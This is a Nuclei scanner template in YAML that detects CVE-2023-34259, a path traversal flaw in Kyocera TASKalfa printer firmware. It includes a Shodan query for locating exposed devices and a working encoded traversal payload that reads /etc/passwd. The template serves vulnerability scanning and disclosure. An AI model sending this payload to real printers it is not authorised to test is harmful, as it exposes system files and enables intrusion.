55 lines
2.0 KiB
YAML
55 lines
2.0 KiB
YAML
id: CVE-2023-34259
|
|
|
|
info:
|
|
name: Kyocera TASKalfa printer - Path Traversal
|
|
author: gy741
|
|
severity: medium
|
|
description: |
|
|
CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
|
|
- https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
|
|
- https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
|
|
- https://sec-consult.com/vulnerability-lab/
|
|
- https://seclists.org/fulldisclosure/2023/Jul/15
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 4.9
|
|
cve-id: CVE-2023-34259
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00554
|
|
epss-percentile: 0.74985
|
|
cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: kyocera
|
|
product: d-copia253mf_plus_firmware
|
|
shodan-query: http.favicon.hash:-50306417
|
|
tags: packetstorm,seclists,cve,cve2023,kyocera,lfi,printer
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: word
|
|
part: server
|
|
words:
|
|
- "KM-MFP"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100e941222153f423c0bb3cf53bcadddd9948f1d0466f1f69a891919c25c2d34b1d0221008f51256c132f8b48557a1b749e08455e4494d2068ab67eda67070db565479024:922c64590222798bb761d5b6d8e72950
|